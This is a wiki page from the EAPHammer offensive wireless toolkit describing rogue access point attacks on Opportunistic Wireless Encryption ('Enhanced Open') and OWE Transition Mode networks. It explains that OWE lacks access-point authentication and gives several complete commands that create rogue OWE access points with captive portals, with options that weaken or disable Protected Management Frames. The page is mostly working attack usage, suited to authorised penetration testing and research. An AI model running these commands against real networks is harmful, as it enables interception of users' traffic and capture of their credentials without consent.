Skip to content

XV. Attacking Opportunistic Wireless Encryption

Gabriel Ryan edited this page Feb 11, 2020 · 1 revision

EAPHammer Wiki

Home

Setup Guide

Usage Guide

Acknowledgements

Clone this wiki locally

Special thanks to Steve Darracott for his help researching this subject: @thedarracott

EAPHammer supports attacks against networks and clients that are configured to use Opportunistic Wireless Encryption (OWE), which is also known as "Enhanced Open". For a theoretical overview of this subject, please refer to the following blog posts:

td;dr - OWE is used to provide encryption capabilities to public wireless networks. You can think of OWE like this - OWE is to open networks as HTTPS is to HTTP. However, unlike HTTPS, OWE does not provide any means of authenticating the identity of what you're connecting to (HTTPS uses server certs). This means that it can be compromised using Person-In-the-Middle (PITM) attacks. From an operational standpoint, this means that you can execute rogue AP attacks against OWE in the same way you would against open networks.

To create a rogue access point that uses OWE, just pass the --auth owe flag as shown in the following example:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal

Note that by default, eaphammer will conform to RFC 8110 by requiring stations to use Protected Management Frames (PMF) when --auth owe is used. You are free to tell eaphammer to violate RFC 8110 by making PMF enabled but not required:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf enable

Should you wish to commit an even more egregious RFC violation, you can disable PMF completely as well:

./eaphammer -i wlan0 --auth owe --essid butTheySaidItsEncrypted --captive-portal --pmf disable

OWE Transition Mode

EAPHammer also supports attacks against OWE Transition Mode. To create a rogue AP that uses OWE Transition Mode, use the --auth owe-transition as shown in the following example:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal

By default, eaphammer will conform to RFC 8110 by enabling but not requiring PMF when --auth owe-transition is used. You are free to tell eaphammer to violate RFC 8110 by making PMF required:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf require

Alternatively, you can disable PMF completely:

./eaphammer -i wlan0 --auth owe-transition --essid wheresMahCertBrah --captive-portal --pmf disable